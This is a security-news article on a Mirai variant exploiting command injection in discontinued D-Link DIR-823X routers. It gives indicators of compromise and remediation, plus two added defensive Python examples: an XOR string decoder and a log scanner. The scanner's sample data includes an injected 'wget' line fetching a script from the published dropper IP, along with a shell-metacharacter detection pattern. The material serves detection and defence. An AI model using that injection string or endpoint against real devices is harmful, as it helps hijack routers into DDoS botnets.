Mirai Variant Targets End-of-Life D-Link Routers
Akamai detects active exploitation of CVE-2025-29635 in discontinued D-Link DIR-823X routers. The tuxnokill variant spreads via command injection and launches DDoS attacks from compromised devices.
Akamai's Security Intelligence Response Team has identified active exploitation of discontinued D-Link routers through a command injection vulnerability first disclosed over a year ago. The campaign deploys a Mirai variant called "tuxnokill" that announces its presence with the message: "nexuscorp has taken control."
The attacks target CVE-2025-29635, a vulnerability rated CVSS 8.8 that affects D-Link DIR-823X series routers running firmware versions 240126 and 24082. D-Link retired these devices in September 2025, leaving owners with no path to patches.
How the Attack Works
The vulnerability exists in the /goform/set_prohibiting endpoint. Attackers send crafted POST requests whose parameters carry shell commands, and the router passes them to a shell without sanitizing them. The exploit downloads a shell script from external infrastructure, which then fetches the tuxnokill binary matching the target's CPU architecture.
Akamai detected this activity against its honeypots beginning in early March 2026, the first confirmed active exploitation since the vulnerability's initial disclosure in March 2025. Security researchers Wang Jinshuai and Zhao Jiangting originally reported the flaw, but it took 13 months for threat actors to weaponize it at scale.
The same campaign also exploits CVE-2023-1389 targeting TP-Link Archer AX21 routers and an RCE vulnerability in ZTE ZXV10 H108L devices—casting a wide net across consumer networking equipment from multiple vendors.
Botnet Capabilities
Tuxnokill retains the core Mirai architecture: XOR-encoded configuration tables, a watchdog module to maintain persistence, and DDoS attack capabilities including TCP SYN/ACK/STOMP floods, UDP floods, and HTTP null attacks. The malware supports multiple CPU architectures, allowing it to infect diverse IoT devices beyond just routers.
After establishing a foothold, tuxnokill deletes its original binary to complicate forensic analysis. It persists through crontab scheduling and systemd service installation. The variant also carries hard-coded credential lists for Telnet brute-force attacks against other devices on the local network.
Secondary payloads exploit CVE-2017-17215 to spread to Huawei HG532 routers sharing the same network—a lateral movement technique that can rapidly expand the botnet's footprint within compromised environments.
Command and Control
Akamai published partial infrastructure details. The initial dropper originates from 88.214.20[.]14, while C2 communications flow to 64.89.161[.]130 on port 44300. The payload uses XOR encoding with key 0x30 and contains standard Mirai strings that make it easily identifiable to network defenders.
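A single-byte XOR key is cheap to strip, which is why the encoded table does little to hide the malware from defenders. The following Python script is an added example, not Akamai's tooling or code from the tuxnokill sample: it builds a constructed table of NUL-separated strings, encodes it with the 0x30 key named above, and shows how an analyst decodes it, extracts strings and, when the key is unknown, recovers it by trying all 256 single-byte values. The marker list assumes that the "standard Mirai strings" are well-known strings from the public Mirai source plus this campaign's banner; the table bytes are constructed, not taken from the real binary.

```python
"""Recover a single-byte-XOR-obscured configuration table of the kind Mirai
variants carry. Added example; not Akamai's tooling or tuxnokill code."""
import re
from typing import List, Optional

KEY = 0x30  # single-byte XOR key reported for the tuxnokill payload

# Strings from the public Mirai source that variants usually keep, plus the
# banner this campaign prints. Treating these as "standard Mirai strings" is
# an assumption; adjust the list for the sample in hand.
MIRAI_MARKERS = [
    b"/bin/busybox",
    b"applet not found",
    b"/dev/watchdog",
    b"nexuscorp has taken control",
]

# Constructed stand-in for the table (not bytes from the real binary):
# NUL-separated strings, stored XOR-encoded the way the malware keeps them.
PLAIN_TABLE = b"\x00".join(MIRAI_MARKERS) + b"\x00"


def xor_bytes(blob: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (encode and decode are the same op)."""
    return bytes(b ^ key for b in blob)


ENCODED_TABLE = xor_bytes(PLAIN_TABLE, KEY)


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Equivalent of `strings`: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def find_markers(blob: bytes, key: int = KEY) -> List[str]:
    """Decode with `key` and report which known marker strings appear."""
    decoded = xor_bytes(blob, key)
    return [m.decode("ascii") for m in MIRAI_MARKERS if m in decoded]


def recover_key(blob: bytes) -> Optional[int]:
    """When the key is unknown, try all 256 single-byte keys and return the
    one that exposes the most markers (None if no key exposes any)."""
    best_key, best_hits = None, 0
    for candidate in range(256):
        hits = len(find_markers(blob, candidate))
        if hits > best_hits:
            best_key, best_hits = candidate, hits
    return best_key


if __name__ == "__main__":
    print("strings in raw blob:", printable_strings(ENCODED_TABLE))
    print("recovered key: 0x%02x" % recover_key(ENCODED_TABLE))
    print("markers:", find_markers(ENCODED_TABLE))
```

Running `strings` on the raw blob yields fragments such as "RECIR_H" (the encoded form of "busybox"), which is why a plain string match on a sample can miss a Mirai build while a one-line XOR sweep finds it; the same marker list can be turned into a YARA rule with the `xor` modifier for scanning at scale.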
This infrastructure pattern mirrors what we've seen in npm supply chain attacks and other campaigns where threat actors maintain dedicated staging servers for initial payload delivery before pivoting to separate C2 channels for ongoing command execution.
Scale of Exposure
D-Link's DIR-823X series was popular in home and small business deployments. These routers remain in service despite reaching end-of-life status—their owners either unaware of the retirement notice or unwilling to replace functioning hardware. Consumer networking equipment historically sees low patch adoption rates even when updates exist.
The pattern repeats across IoT categories. Our coverage of Cisco ISE vulnerabilities and other enterprise network gear demonstrates that even managed infrastructure often lags on security updates. Unmanaged consumer devices face far worse outcomes.
Why This Matters
Mirai variants remain the dominant botnet family nearly a decade after the original source code leak. The malware's modular design makes it trivial for threat actors to add new exploits—CVE-2025-29635 required only minor integration work to join tuxnokill's arsenal.
For organizations defending against DDoS attacks, this campaign represents another increment in attacker resources. Each compromised router adds bandwidth to potential attack traffic. The same devices that can't receive patches will likely remain infected until they're physically replaced or disconnected.
Remediation
Owners of D-Link DIR-823X routers should replace the devices. No firmware update will fix CVE-2025-29635 because D-Link has discontinued support. As a temporary measure:
- Disable remote administration interfaces
- Change default administrative credentials to strong, unique passwords
- Monitor for unexpected outbound connections to unknown IP addresses
- Consider network-level blocking of known C2 infrastructure
For more context on malware defense strategies, including network segmentation approaches that limit botnet impact, see our security guides.
Network administrators can add the published IOCs to detection systems and monitor for the "nexuscorp has taken control" string in device logs as an indicator of successful compromise.
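The three indicators this article gives (POST requests with shell metacharacters to /goform/set_prohibiting, outbound traffic to the published dropper and C2 addresses, and the takeover banner in device logs) can be turned into a small log-scanning rule set. The Python below is an added example, not Akamai's detection logic: the three log formats and every sample line are constructed, the attacker addresses and the form parameter name are invented, and only the path, IP addresses, port and banner come from the article.

```python
"""Flag log lines that match the tuxnokill indicators in the write-up.
Added example, not Akamai's detection logic. Log formats and the sample
lines are constructed; the IPs, port, path and banner come from the article."""
import re
from typing import List, Optional, Tuple

VULN_PATH = "/goform/set_prohibiting"            # injected endpoint
BANNER = "nexuscorp has taken control"          # printed after takeover
IOC_IPS = {                                      # defanged in the article
    "88.214.20.14": "dropper host",
    "64.89.161.130": "C2 host",
}
C2_PORT = 44300
# Shell metacharacters that have no business in this endpoint's form fields
SHELL_META = re.compile(r"[;|`]|\$\(|&&")

# Constructed sample lines in three made-up formats (HTTP access, connection
# tracking, device syslog). Attacker addresses and parameter name are invented.
SAMPLE_LOGS = [
    'http 203.0.113.7 "POST /goform/set_prohibiting HTTP/1.1" body="iface=eth0"',
    'http 198.51.100.9 "POST /goform/set_prohibiting HTTP/1.1" '
    'body="iface=eth0;wget http://88.214.20.14/placeholder.sh"',
    'http 198.51.100.9 "GET /index.html HTTP/1.1" body=""',
    "conn 192.168.0.1 -> 64.89.161.130:44300 proto=tcp",
    "conn 192.168.0.1 -> 192.0.2.80:443 proto=tcp",
    "syslog router kernel: nexuscorp has taken control",
]

HTTP_RE = re.compile(r'^http (\S+) "(\S+) (\S+) HTTP/[\d.]+" body="(.*)"$')
CONN_RE = re.compile(r"^conn (\S+) -> (\S+):(\d+)")


def classify(line: str) -> Optional[str]:
    """Return an alert label for one line, or None when nothing matches."""
    m = HTTP_RE.match(line)
    if m:
        src, method, path, body = m.groups()
        # Injection attempt: POST to the vulnerable endpoint with shell syntax
        if method == "POST" and path == VULN_PATH and SHELL_META.search(body):
            return f"CVE-2025-29635 injection attempt from {src}"
        return None
    m = CONN_RE.match(line)
    if m:
        src, dst, port = m.groups()
        # Outbound contact with the published dropper or C2 infrastructure
        if dst in IOC_IPS:
            role = IOC_IPS[dst]
            if dst == "64.89.161.130" and int(port) == C2_PORT:
                role = "C2 beacon"
            return f"{role}: {src} -> {dst}:{port}"
        return None
    # Post-compromise banner left in device logs
    if BANNER in line:
        return "compromise banner in device log"
    return None


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Run classify() over a log and keep only the lines that fired."""
    hits = []
    for line in lines:
        alert = classify(line)
        if alert:
            hits.append((alert, line))
    return hits


if __name__ == "__main__":
    for alert, line in scan(SAMPLE_LOGS):
        print(f"[ALERT] {alert}\n        {line}")
```

The endpoint rule fires on the metacharacters rather than on a specific payload, so it still catches a request that fetches its script from a different host than the one published; the connection rule is the one that goes stale first, since staging and C2 addresses rotate, and it should be fed from a maintained IOC list rather than the two literals shown here.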
Apr 8, 2026